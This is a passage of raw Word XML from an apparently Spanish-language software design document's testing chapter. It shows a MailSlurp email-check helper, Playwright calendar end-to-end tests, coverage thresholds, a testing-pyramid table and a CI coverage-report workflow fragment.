          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">60000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> } </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">const</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> emails </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mailslurp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">waitForLatestEmail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(inboxId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> timeout)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (subjectContains </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">!</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">?.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">includes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(subjectContains))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`Subject mismatch: expected "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subjectContains</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimStringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">", got "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">${</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">emails</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">subject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emails</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deleteInbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(inboxId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await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> mailslurp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">deleteInbox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(inboxId)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="210"/>
    <w:bookmarkStart w:id="211" w:name="calendario-sync-caldav-e2e"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.3.3 Calendario: Sync CalDAV E2E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// packages/web/e2e/calendar.spec.ts</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ImportTok"/>
        </w:rPr>
        <w:t xml:space="preserve">import</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> { test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'@playwright/test'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">describe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Calendario E2E'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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'navegación entre vistas día/semana/mes'</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'/calendar'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Verificar vista semanal por defecto</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'.fc-timeGridWeek-view'</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Cambiar a vista mensual</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'text=Mes'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'.fc-dayGridMonth-view'</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Cambiar a vista diaria</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'text=Día'</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'.fc-timeGridDay-view'</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test</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'crear evento y visualizarlo'</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'/calendar'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Click en slot horario</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'.fc-time-grid .fc-slats tr[data-time="10:00:00"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Llenar formulario</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'[data-testid="event-title"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Reunión E2E'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'[data-testid="event-location"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'Sala Virtual'</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'[data-testid="event-save"]'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Verificar que aparece en el calendario</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'text=Reunión E2E'</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11"/>
    <w:bookmarkEnd w:id="212"/>
    <w:bookmarkStart w:id="216" w:name="cobertura-y-ci"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.4 Cobertura y CI</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="213" w:name="thresholds-de-cobertura"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.4.1 Thresholds de Cobertura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Métrica</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Threshold</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Justificación</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Líneas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Cobertura completa de lógica de negocio</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Funciones</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Todas las funciones públicas testeadas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ramas</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">80%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Casos de error y paths alternativos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Statements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">85%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sentencias ejecutables</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="213"/>
    <w:bookmarkStart w:id="214" w:name="pirámide-de-testing-702010"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.4.2 Pirámide de Testing: 70/20/10</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1386"/>
        <w:gridCol w:w="2376"/>
        <w:gridCol w:w="2178"/>
        <w:gridCol w:w="1980"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Nivel</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Proporción</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ejemplos</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Unitario</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">70%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vitest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Composables, servicios, sanitización, utilidades</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Integración</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">20%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Vitest + Testcontainers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">API endpoints, DB queries, auth flows</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">E2E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">10%</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Playwright</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Login→compose→send, calendario, drag-drop</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="214"/>
    <w:bookmarkStart w:id="215" w:name="reporte-de-cobertura-en-prs"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">12.4.3 Reporte de Cobertura en PRs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La acción</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">davelosert/vitest-coverage-report-action@v2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">publica reportes de cobertura como comentarios en pull requests, con comparación contra la rama base</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[216]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">[272]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Fragmento del workflow CI (completo en capítulo 13)</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tests with coverage</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">run</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> pnpm -r test:unit --coverage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coverage report</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coverage-report</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'**/coverage/*.json'</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 coverage comment</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">uses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> davelosert/vitest-coverage-report-action@v2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json-summary-path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./packages/api/coverage/coverage-summary.json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">json-final-path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> ./packages/api/coverage/coverage-final.json</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">file-coverage-mode</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> changes</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="FunctionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">reportOnFailure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">true</w:t>
      </w:r>
    </w:p>
    <w:p>
